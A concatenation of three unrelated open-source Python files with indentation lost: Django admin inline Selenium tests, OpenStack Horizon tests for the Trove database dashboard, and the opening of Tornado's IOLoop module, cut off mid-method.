reverse('admin:admin_inlines_profilecollection_add')))
# Add a few inlines
self.selenium.find_element_by_link_text('Add another Profile').click()
self.selenium.find_element_by_link_text('Add another Profile').click()
self.selenium.find_element_by_link_text('Add another Profile').click()
self.selenium.find_element_by_link_text('Add another Profile').click()
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'#profile_set-group table tr.dynamic-profile_set')), 5)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-0')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-1')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-2')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-3')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-4')), 1)
# Click on a few delete buttons
self.selenium.find_element_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-1 td.delete a').click()
self.selenium.find_element_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-2 td.delete a').click()
# Verify that they're gone and that the IDs have been re-sequenced
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'#profile_set-group table tr.dynamic-profile_set')), 3)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-0')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-1')), 1)
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
'form#profilecollection_form tr.dynamic-profile_set#profile_set-2')), 1)
def test_alternating_rows(self):
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_inlines_profilecollection_add')))
# Add a few inlines
self.selenium.find_element_by_link_text('Add another Profile').click()
self.selenium.find_element_by_link_text('Add another Profile').click()
row_selector = 'form#profilecollection_form tr.dynamic-profile_set'
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
"%s.row1" % row_selector)), 2, msg="Expect two row1 styled rows")
self.assertEqual(len(self.selenium.find_elements_by_css_selector(
"%s.row2" % row_selector)), 1, msg="Expect one row2 styled row")
def test_collapsed_inlines(self):
# Collapsed inlines have SHOW/HIDE links.
self.admin_login(username='super', password='secret')
self.selenium.get(self.live_server_url + reverse('admin:admin_inlines_author_add'))
# One field is in a stacked inline, other in a tabular one.
test_fields = ['id_nonautopkbook_set-0-title', 'id_nonautopkbook_set-2-0-title']
show_links = self.selenium.find_elements_by_link_text('SHOW')
self.assertEqual(len(show_links), 2)
for show_index, field_name in enumerate(test_fields, 0):
self.assertFalse(self.selenium.find_element_by_id(field_name).is_displayed())
show_links[show_index].click()
self.assertTrue(self.selenium.find_element_by_id(field_name).is_displayed())
hide_links = self.selenium.find_elements_by_link_text('HIDE')
self.assertEqual(len(hide_links), 2)
for hide_index, field_name in enumerate(test_fields, 0):
self.assertTrue(self.selenium.find_element_by_id(field_name).is_displayed())
hide_links[hide_index].click()
self.assertFalse(self.selenium.find_element_by_id(field_name).is_displayed())
class SeleniumChromeTests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class SeleniumIETests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
|
|
# Copyright 2013 Mirantis Inc.
# Copyright 2013 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import django
from django.core.urlresolvers import reverse
from django import http
from django.utils import unittest
from mox3.mox import IsA # noqa
import six
from horizon import exceptions
from openstack_dashboard import api as dash_api
from openstack_dashboard.contrib.trove import api
from openstack_dashboard.test import helpers as test
from troveclient import common
INDEX_URL = reverse('horizon:project:databases:index')
LAUNCH_URL = reverse('horizon:project:databases:launch')
DETAILS_URL = reverse('horizon:project:databases:detail', args=['id'])
class DatabaseTests(test.TestCase):
@test.create_stubs(
{api.trove: ('instance_list', 'flavor_list')})
def test_index(self):
# Mock database instances
databases = common.Paginated(self.databases.list())
api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
.AndReturn(databases)
# Mock flavors
api.trove.flavor_list(IsA(http.HttpRequest))\
.AndReturn(self.flavors.list())
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/databases/index.html')
# Check the Host column displaying ip or hostname
self.assertContains(res, '10.0.0.3')
self.assertContains(res, 'trove.instance-2.com')
@test.create_stubs(
{api.trove: ('instance_list', 'flavor_list')})
def test_index_flavor_exception(self):
# Mock database instances
databases = common.Paginated(self.databases.list())
api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
.AndReturn(databases)
# Mock flavors
api.trove.flavor_list(IsA(http.HttpRequest))\
.AndRaise(self.exceptions.trove)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/databases/index.html')
self.assertMessageCount(res, error=1)
@test.create_stubs(
{api.trove: ('instance_list',)})
def test_index_list_exception(self):
# Mock database instances
api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
.AndRaise(self.exceptions.trove)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/databases/index.html')
self.assertMessageCount(res, error=1)
@test.create_stubs(
{api.trove: ('instance_list', 'flavor_list')})
def test_index_pagination(self):
# Mock database instances
databases = self.databases.list()
last_record = databases[1]
databases = common.Paginated(databases, next_marker="foo")
api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
.AndReturn(databases)
# Mock flavors
api.trove.flavor_list(IsA(http.HttpRequest))\
.AndReturn(self.flavors.list())
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/databases/index.html')
self.assertContains(
res, 'marker=' + last_record.id)
@test.create_stubs(
{api.trove: ('instance_list', 'flavor_list')})
def test_index_flavor_list_exception(self):
# Mocking instances.
databases = common.Paginated(self.databases.list())
api.trove.instance_list(
IsA(http.HttpRequest),
marker=None,
).AndReturn(databases)
# Mocking flavor list with raising an exception.
api.trove.flavor_list(
IsA(http.HttpRequest),
).AndRaise(self.exceptions.trove)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/databases/index.html')
self.assertMessageCount(res, error=1)
@test.create_stubs({
api.trove: ('flavor_list', 'backup_list',
'datastore_list', 'datastore_version_list',
'instance_list'),
dash_api.neutron: ('network_list',)})
def test_launch_instance(self):
api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
self.flavors.list())
api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
self.database_backups.list())
api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
self.databases.list())
# Mock datastores
api.trove.datastore_list(IsA(http.HttpRequest)).AndReturn(
self.datastores.list())
# Mock datastore versions
api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str)).\
AndReturn(self.datastore_versions.list())
dash_api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False).AndReturn(
self.networks.list()[:1])
dash_api.neutron.network_list(IsA(http.HttpRequest),
shared=True).AndReturn(
self.networks.list()[1:])
self.mox.ReplayAll()
res = self.client.get(LAUNCH_URL)
self.assertTemplateUsed(res, 'project/databases/launch.html')
# django 1.7 and later does not handle the thrown Http302
# exception well enough.
# TODO(mrunge): re-check when django-1.8 is stable
@unittest.skipIf(django.VERSION >= (1, 7, 0),
'Currently skipped with Django >= 1.7')
@test.create_stubs({api.trove: ('flavor_list',)})
def test_launch_instance_exception_on_flavors(self):
trove_exception = self.exceptions.nova
api.trove.flavor_list(IsA(http.HttpRequest)).AndRaise(trove_exception)
self.mox.ReplayAll()
toSuppress = ["openstack_dashboard.dashboards.project.databases."
"workflows.create_instance",
"horizon.workflows.base"]
# Suppress expected log messages in the test output
loggers = []
for cls in toSuppress:
logger = logging.getLogger(cls)
loggers.append((logger, logger.getEffectiveLevel()))
logger.setLevel(logging.CRITICAL)
try:
with self.assertRaises(exceptions.Http302):
self.client.get(LAUNCH_URL)
finally:
# Restore the previous log levels
for (log, level) in loggers:
log.setLevel(level)
@test.create_stubs({
api.trove: ('flavor_list', 'backup_list', 'instance_create',
'datastore_list', 'datastore_version_list',
'instance_list'),
dash_api.neutron: ('network_list',)})
def test_create_simple_instance(self):
api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
self.flavors.list())
api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
self.database_backups.list())
api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
self.databases.list())
# Mock datastores
api.trove.datastore_list(IsA(http.HttpRequest))\
.AndReturn(self.datastores.list())
# Mock datastore versions
api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str))\
.AndReturn(self.datastore_versions.list())
dash_api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False).AndReturn(
self.networks.list()[:1])
dash_api.neutron.network_list(IsA(http.HttpRequest),
shared=True).AndReturn(
self.networks.list()[1:])
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
# Actual create database call
api.trove.instance_create(
IsA(http.HttpRequest),
IsA(six.text_type),
IsA(int),
IsA(six.text_type),
databases=None,
datastore=IsA(six.text_type),
datastore_version=IsA(six.text_type),
restore_point=None,
replica_of=None,
users=None,
nics=nics).AndReturn(self.databases.first())
self.mox.ReplayAll()
post = {
'name': "MyDB",
'volume': '1',
'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
'network': self.networks.first().id,
'datastore': 'mysql,5.5',
}
res = self.client.post(LAUNCH_URL, post)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({
api.trove: ('flavor_list', 'backup_list', 'instance_create',
'datastore_list', 'datastore_version_list',
'instance_list'),
dash_api.neutron: ('network_list',)})
def test_create_simple_instance_exception(self):
trove_exception = self.exceptions.nova
api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
self.flavors.list())
api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
self.database_backups.list())
api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
self.databases.list())
# Mock datastores
api.trove.datastore_list(IsA(http.HttpRequest))\
.AndReturn(self.datastores.list())
# Mock datastore versions
api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str))\
.AndReturn(self.datastore_versions.list())
dash_api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False).AndReturn(
self.networks.list()[:1])
dash_api.neutron.network_list(IsA(http.HttpRequest),
shared=True).AndReturn(
self.networks.list()[1:])
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
# Actual create database call
api.trove.instance_create(
IsA(http.HttpRequest),
IsA(six.text_type),
IsA(int),
IsA(six.text_type),
databases=None,
datastore=IsA(six.text_type),
datastore_version=IsA(six.text_type),
restore_point=None,
replica_of=None,
users=None,
nics=nics).AndRaise(trove_exception)
self.mox.ReplayAll()
post = {
'name': "MyDB",
'volume': '1',
'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
'network': self.networks.first().id,
'datastore': 'mysql,5.5',
}
res = self.client.post(LAUNCH_URL, post)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(
{api.trove: ('instance_get', 'flavor_get',)})
def _test_details(self, database, with_designate=False):
api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
.AndReturn(database)
api.trove.flavor_get(IsA(http.HttpRequest), IsA(str))\
.AndReturn(self.flavors.first())
self.mox.ReplayAll()
res = self.client.get(DETAILS_URL)
self.assertTemplateUsed(res, 'project/databases/detail.html')
if with_designate:
self.assertContains(res, database.hostname)
else:
self.assertContains(res, database.ip[0])
def test_details_with_ip(self):
database = self.databases.first()
self._test_details(database, with_designate=False)
def test_details_with_hostname(self):
database = self.databases.list()[1]
self._test_details(database, with_designate=True)
@test.create_stubs(
{api.trove: ('instance_get', 'flavor_get', 'users_list',
'user_list_access', 'user_delete')})
def test_user_delete(self):
database = self.databases.first()
user = self.database_users.first()
user_db = self.database_user_dbs.first()
database_id = database.id
# Instead of using the user's ID, the api uses the user's name. BOOO!
user_id = user.name
# views.py: DetailView.get_data
api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
.AndReturn(database)
api.trove.flavor_get(IsA(http.HttpRequest), IsA(str))\
.AndReturn(self.flavors.first())
# tabs.py: UserTab.get_user_data
api.trove.users_list(IsA(http.HttpRequest),
database_id).AndReturn([user])
api.trove.user_list_access(IsA(http.HttpRequest),
database_id,
user_id).AndReturn([user_db])
# tables.py: DeleteUser.delete
api.trove.user_delete(IsA(http.HttpRequest),
database_id,
user_id).AndReturn(None)
self.mox.ReplayAll()
details_url = reverse('horizon:project:databases:detail',
args=[database_id])
url = details_url + '?tab=instance_details__users_tab'
action_string = u"users__delete__%s" % user_id
form_data = {'action': action_string}
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({
api.trove: ('instance_get', 'instance_resize_volume')})
def test_resize_volume(self):
database = self.databases.first()
database_id = database.id
database_size = database.volume.get('size')
# views.py: DetailView.get_data
api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
.AndReturn(database)
# forms.py: ResizeVolumeForm.handle
api.trove.instance_resize_volume(IsA(http.HttpRequest),
database_id,
IsA(int)).AndReturn(None)
self.mox.ReplayAll()
url = reverse('horizon:project:databases:resize_volume',
args=[database_id])
post = {
'instance_id': database_id,
'orig_size': database_size,
'new_size': database_size + 1,
}
res = self.client.post(url, post)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.trove: ('instance_get', )})
def test_resize_volume_bad_value(self):
database = self.databases.first()
database_id = database.id
database_size = database.volume.get('size')
# views.py: DetailView.get_data
api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
.AndReturn(database)
self.mox.ReplayAll()
url = reverse('horizon:project:databases:resize_volume',
args=[database_id])
post = {
'instance_id': database_id,
'orig_size': database_size,
'new_size': database_size,
}
res = self.client.post(url, post)
self.assertContains(
res, "New size for volume must be greater than current size.")
@test.create_stubs(
{api.trove: ('instance_get',
'flavor_list')})
def test_resize_instance_get(self):
database = self.databases.first()
# views.py: DetailView.get_data
api.trove.instance_get(IsA(http.HttpRequest), database.id)\
.AndReturn(database)
api.trove.flavor_list(IsA(http.HttpRequest)).\
AndReturn(self.database_flavors.list())
self.mox.ReplayAll()
url = reverse('horizon:project:databases:resize_instance',
args=[database.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'project/databases/resize_instance.html')
option = '<option value="%s">%s</option>'
for flavor in self.database_flavors.list():
if flavor.id == database.flavor['id']:
self.assertNotContains(res, option % (flavor.id, flavor.name))
else:
self.assertContains(res, option % (flavor.id, flavor.name))
@test.create_stubs(
{api.trove: ('instance_get',
'flavor_list',
'instance_resize')})
def test_resize_instance(self):
database = self.databases.first()
# views.py: DetailView.get_data
api.trove.instance_get(IsA(http.HttpRequest), database.id)\
.AndReturn(database)
api.trove.flavor_list(IsA(http.HttpRequest)).\
AndReturn(self.database_flavors.list())
old_flavor = self.database_flavors.list()[0]
new_flavor = self.database_flavors.list()[1]
api.trove.instance_resize(IsA(http.HttpRequest),
database.id,
new_flavor.id).AndReturn(None)
self.mox.ReplayAll()
url = reverse('horizon:project:databases:resize_instance',
args=[database.id])
post = {
'instance_id': database.id,
'old_flavor_name': old_flavor.name,
'old_flavor_id': old_flavor.id,
'new_flavor': new_flavor.id
}
res = self.client.post(url, post)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({
api.trove: ('flavor_list', 'backup_list', 'instance_create',
'datastore_list', 'datastore_version_list',
'instance_list', 'instance_get'),
dash_api.neutron: ('network_list',)})
def test_create_replica_instance(self):
api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
self.flavors.list())
api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
self.database_backups.list())
api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
self.databases.list())
api.trove.datastore_list(IsA(http.HttpRequest))\
.AndReturn(self.datastores.list())
api.trove.datastore_version_list(IsA(http.HttpRequest),
IsA(str))\
.AndReturn(self.datastore_versions.list())
dash_api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False).\
AndReturn(self.networks.list()[:1])
dash_api.neutron.network_list(IsA(http.HttpRequest),
shared=True).\
AndReturn(self.networks.list()[1:])
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
.AndReturn(self.databases.first())
# Actual create database call
api.trove.instance_create(
IsA(http.HttpRequest),
IsA(six.text_type),
IsA(int),
IsA(six.text_type),
databases=None,
datastore=IsA(six.text_type),
datastore_version=IsA(six.text_type),
restore_point=None,
replica_of=self.databases.first().id,
users=None,
nics=nics).AndReturn(self.databases.first())
self.mox.ReplayAll()
post = {
'name': "MyDB",
'volume': '1',
'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
'network': self.networks.first().id,
'datastore': 'mysql,5.5',
'initial_state': 'master',
'master': self.databases.first().id
}
res = self.client.post(LAUNCH_URL, post)
self.assertRedirectsNoFollow(res, INDEX_URL)
|
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""An I/O event loop for non-blocking sockets.
Typical applications will use a single `IOLoop` object, in the
`IOLoop.instance` singleton. The `IOLoop.start` method should usually
be called at the end of the ``main()`` function. Atypical applications may
use more than one `IOLoop`, such as one `IOLoop` per thread, or per `unittest`
case.
In addition to I/O events, the `IOLoop` can also schedule time-based events.
`IOLoop.add_timeout` is a non-blocking alternative to `time.sleep`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import errno
import functools
import heapq
import itertools
import logging
import numbers
import os
import select
import sys
import threading
import time
import traceback
import math
from tornado.concurrent import TracebackFuture, is_future
from tornado.log import app_log, gen_log
from tornado.platform.auto import set_close_exec, Waker
from tornado import stack_context
from tornado.util import PY3, Configurable, errno_from_exception, timedelta_to_seconds
try:
import signal
except ImportError:
signal = None
if PY3:
import _thread as thread
else:
import thread
_POLL_TIMEOUT = 3600.0
class TimeoutError(Exception):
pass
class IOLoop(Configurable):
"""A level-triggered I/O loop.
We use ``epoll`` (Linux) or ``kqueue`` (BSD and Mac OS X) if they
are available, or else we fall back on select(). If you are
implementing a system that needs to handle thousands of
simultaneous connections, you should use a system that supports
either ``epoll`` or ``kqueue``.
Example usage for a simple TCP server:
.. testcode::
import errno
import functools
import tornado.ioloop
import socket
def connection_ready(sock, fd, events):
while True:
try:
connection, address = sock.accept()
except socket.error as e:
if e.args[0] not in (errno.EWOULDBLOCK, errno.EAGAIN):
raise
return
connection.setblocking(0)
handle_connection(connection, address)
if __name__ == '__main__':
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(0)
sock.bind(("", port))
sock.listen(128)
io_loop = tornado.ioloop.IOLoop.current()
callback = functools.partial(connection_ready, sock)
io_loop.add_handler(sock.fileno(), callback, io_loop.READ)
io_loop.start()
.. testoutput::
:hide:
By default, a newly-constructed `IOLoop` becomes the thread's current
`IOLoop`, unless there already is a current `IOLoop`. This behavior
can be controlled with the ``make_current`` argument to the `IOLoop`
constructor: if ``make_current=True``, the new `IOLoop` will always
try to become current and it raises an error if there is already a
current instance. If ``make_current=False``, the new `IOLoop` will
not try to become current.
.. versionchanged:: 4.2
Added the ``make_current`` keyword argument to the `IOLoop`
constructor.
"""
# Constants from the epoll module
_EPOLLIN = 0x001
_EPOLLPRI = 0x002
_EPOLLOUT = 0x004
_EPOLLERR = 0x008
_EPOLLHUP = 0x010
_EPOLLRDHUP = 0x2000
_EPOLLONESHOT = (1 << 30)
_EPOLLET = (1 << 31)
# Our events map exactly to the epoll events
NONE = 0
READ = _EPOLLIN
WRITE = _EPOLLOUT
ERROR = _EPOLLERR | _EPOLLHUP
# Global lock for creating global IOLoop instance
_instance_lock = threading.Lock()
_current = threading.local()
@staticmethod
def instance():
"""Returns a global `IOLoop` instance.
Most applications have a single, global `IOLoop` running on the
main thread. Use this method to get this instance from
another thread. In most other cases, it is better to use `current()`
to get the current thread's `IOLoop`.
"""
if not hasattr(IOLoop, "_instance"):
with IOLoop._instance_lock:
if not hasattr(IOLoop, "_instance"):
# New instance after double check
IOLoop._instance = IOLoop()
return IOLoop._instance
@staticmethod
def initialized():
"""Returns true if the singleton instance has been created."""
return hasattr(IOLoop, "_instance")
def install(self):
"""Installs this `IOLoop` object as the singleton instance.
This is normally not necessary as `instance()` will create
an `IOLoop` on demand, but you may want to call `install` to use
a custom subclass of `IOLoop`.
When using an `IOLoop` subclass, `install` must be called prior
to creating any objects that implicitly create their own
`IOLoop` (e.g., :class:`tornado.httpclient.AsyncHTTPClient`).
"""
assert not IOLoop.initialized()
IOLoop._instance = self
@staticmethod
def clear_instance():
"""Clear the global `IOLoop` instance.
.. versionadded:: 4.0
"""
if hasattr(IOLoop, "_instance"):
del IOLoop._instance
@staticmethod
def current(instance=True):
"""Returns the current thread's `IOLoop`.
If an `IOLoop` is currently running or has been marked as
current by `make_current`, returns that instance. If there is
no current `IOLoop`, returns `IOLoop.instance()` (i.e. the
main thread's `IOLoop`, creating one if necessary) if ``instance``
is true.
In general you should use `IOLoop.current` as the default when
constructing an asynchronous object, and use `IOLoop.instance`
when you mean to communicate to the main thread from a different
one.
.. versionchanged:: 4.1
Added ``instance`` argument to control the fallback to
`IOLoop.instance()`.
"""
current = getattr(IOLoop._current, "instance", None)
if current is None and instance:
return IOLoop.instance()
return current
def make_current(self):
"""Makes this the `IOLoop` for the current thread.
An `IOLoop` automatically becomes current for its thread
when it is started, but it is sometimes useful to call
`make_current` explicitly before starting the `IOLoop`,
so that code run at startup time can find the right
instance.
.. versionchanged:: 4.1
An `IOLoop` created while there is no current `IOLoop`
will automatically become current.
"""
IOLoop._current.instance = self
@staticmethod
def clear_current():
IOLoop._current.instance = None
@classmethod
def configurable_base(cls):
return IOLoop
@classmethod
def configurable_default(cls):
if hasattr(select, "epoll"):
from tornado.platform.epoll import EPollIOLoop
return EPollIOLoop
if hasattr(select, "kqueue"):
# Python 2.6+ on BSD or Mac
from tornado.platform.kqueue import KQueueIOLoop
return KQueueIOLoop
from tornado.platform.select import SelectIOLoop
return SelectIOLoop
def initialize(self, make_current=None):
if make_current is None:
if IOLoop.current(instance=False) is None:
self.make_current()
elif make_current:
if IOLoop.current(instance=False) is not None:
raise RuntimeError("current IOLoop already exists")
self.make_current()
def close(self, all_fds=False):
"""Closes the `IOLoop`, freeing any resources used.
If ``all_fds`` is true, all file descriptors registered on the
IOLoop will be closed (not just the ones created by the
`IOLoop` itself).
Many applications will only use a single `IOLoop` that runs for the
entire lifetime of the process. In that case closing the `IOLoop`
is not necessary since everything will be cleaned up when the
process exits. `IOLoop.close` is provided mainly for scenarios
such as unit tests, which create and destroy a large number of
``IOLoops``.
An `IOLoop` must be completely stopped before it can be closed. This
means that `IOLoop.stop()` must be called *and* `IOLoop.start()` must
be allowed to return before attempting to call `IOLoop.close()`.
Therefore the call to `close` will usually appear just after
the call to `start` rather than near the call to `stop`.
.. versionchanged:: 3.1
If the `IOLoop` implementation supports non-integer objects
for "file descriptors", those objects will have their
``close`` method when ``all_fds`` is true.
"""
raise NotImplementedError()
def add_handler(self, fd, handler, events):
"""Registers the given handler to receive the given events for ``fd``.
The ``fd`` argument may either be an integer file descriptor or
a file-like object with a ``fileno()`` method (and optionally a
``close()`` method, which may be called when the `IOLoop` is shut
down).
The ``events`` argument is a bitwise or of the constants
``IOLoop.READ``, ``IOLoop.WRITE``, and ``IOLoop.ERROR``.
When an event occurs, ``handler(fd, events)`` will be run.
.. versionchanged:: 4.0
Added the ability to pass file-like objects in addition to
raw file descriptors.
"""
raise NotImplementedError()
def update_handler(self, fd, events):
"""Changes the events we listen for ``fd``.
.. versionchanged:: 4.0
Added the ability to pass file-like objects in addition to
raw file descriptors.
"""
raise NotImplementedError()
def remove_handler(self, fd):
"""Stop listening for events on ``fd``.
.. versionchanged:: 4.0
Added the ability to pass file-like objects in addition to
raw file descriptors.
"""
raise NotImplementedError()
def set_blocking_signal_threshold(self, seconds, action):
"""Sends a signal if the `IOLoop` is blocked for more than
``s`` seconds.
Pass ``seconds=None`` to disable. Requires Python 2.6 on a unixy
platform.
The action parameter is a Python signal handler. Read the
documentation for the `signal` module for more information.
If ``action`` is None, the process will be killed if it is
blocked for too long.
"""
raise NotImplementedError()
def set_blocking_log_threshold(self, seconds):
"""Logs a stack trace if the `IOLoop` is blocked for more than
``s`` seconds.
Equivalent to ``set_blocking_signal_threshold(seconds,
self.log_stack)``
"""
self.set_blocking_signal_threshold(seconds, self.log_stack)
def log_stack(self, signal, frame):
"""Signal handler to log the stack trace of the current thread.
For use with `set_blocking_signal_threshold`.
"""
gen_log.warning('IOLoop blocked for %f seconds in\n%s',
self._blocking_signal_threshold,
''.join(traceback.format_stack(frame)))
def start(self):
"""Starts the I/O loop.
The loop will run until one of the callbacks calls `stop()`, which
will make the loop stop after the current event iteration completes.
"""
raise NotImplementedError()
def _setup_logging(self):
"""The IOLoop catches and logs exceptions, so it's
important that log output be visible. However, python's
default behavior for non-root loggers (prior to python
3.2) is to print an unhelpful "no handlers could be
found" message rather than the actual log entry, so we
must explicitly configure logging if we've made it this
far without anything.
This method should be called from start() in subclasses.
"""
if not any([logging.getLogger().handlers,
logging.getLogger('tornado').handlers,
logging.getLogger('tornado.application').handlers]):
logging.basicConfig()
def stop(self):
"""Stop the I/O loop.
If the event loop is not currently running, the next call to `start()`
will return immediately.
To use asynchronous methods from otherwise-synchronous code (such as
unit tests), you can start and stop the event loop like this::
ioloop = IOLoop()
async_method(ioloop=ioloop, callback=ioloop.stop)
ioloop.start()
``ioloop.start()`` will return after ``async_method`` has run
its callback, whether that callback was invoked before or
after ``ioloop.start``.
Note that even after `stop` has been called, the `IOLoop` is not
completely stopped until `IOLoop.start` has also returned.
Some work that was scheduled before the call to `stop` may still
be run before the `IOLoop` shuts down.
"""
raise NotImplementedError()
def run_sync(self, func, timeout=None):
"""Starts the `IOLoop`, runs the given function, and stops the loop.
The function must return either a yieldable object or
``None``. If the function returns a yieldable object, the
`IOLoop` will run until the yieldable is resolved (and
`run_sync()` will return the yieldable's result). If it raises
an exception, the `IOLoop` will stop and the exception will be
re-raised to the caller.
The keyword-only argument ``timeout`` may be used to set
a maximum duration for the function. If the timeout expires,
a `TimeoutError` is raised.
This method is useful in conjunction with `tornado.gen.coroutine`
to allow asynchronous calls in a ``main()`` function::
@gen.coroutine
def main():
# do stuff...
if __name__ == '__main__':
IOLoop.current().run_sync(main)
.. versionchanged:: 4.3
Returning a non-``None``, non-yieldable value is now an error.
"""
future_cell = [None]
def run():
try:
result = func()
if result is not None:
from tornado.gen import convert_yielded
result = convert_yielded(result)
except Exception:
future_cell[0] = TracebackFuture()
future_cell[0].set_exc_info(sys.exc_info())
else:
if is_future(result):
future_cell[0] = result
else:
future_cell[0] = TracebackFuture()
future_cell[0].set_result(result)
self.add_future(future_cell[0], lambda future: self.stop())
self.add_callback(run)
if timeout is not None:
timeout_handle = self.add_timeout(self.time() + timeout, self.stop)
self.start()
if timeout is not None:
self.remove_timeout(timeout_handle)
if not future_cell[0].done():
raise TimeoutError('Operation timed out after %s seconds' % timeout)
return future_cell[0].result()
def time(self):
"""Returns the current time according to the `IOLoop`'s clock.
The return value is a floating-point number relative to an
unspecified time in the past.
By default, the `IOLoop`'s time function is `time.time`. However,
it may be configured to use e.g. `time.monotonic` instead.
Calls to `add_timeout` that pass a number instead of a
`datetime.timedelta` should use this function to compute the
appropriate time, so they can work no matter what time function
is chosen.
"""
return time.time()
def add_timeout(self, deadline, callback, *args, **kwargs):
"""Runs the ``callback`` at the time ``deadline`` from the I/O loop.
Returns an opaque handle that may be passed to
`remove_timeout` to cancel.
``deadline`` may be a number denoting a time (on the same
scale as `IOLoop.time`, normally `time.time`), or a
`datetime.timedelta` object for a deadline relative to the
current time. Since Tornado 4.0, `call_later` is a more
convenient alternative for the relative case since it does not
require a timedelta object.
Note that it is not safe to call `add_timeout` from other threads.
Instead, you must use `add_callback` to transfer control to the
`IOLoop`'s thread, and then call `add_timeout` from there.
Subclasses of IOLoop must implement either `add_timeout` or
`call_at`; the default implementations of each will call
the other. `call_at` is usually easier to implement, but
subclasses that wish to maintain compatibility with Tornado
versions prior to 4.0 must use `add_timeout` instead.
.. versionchanged:: 4.0
Now passes through ``*args`` and ``**kwargs`` to the callback.
"""
if isinstance(deadline, numbers.Real):
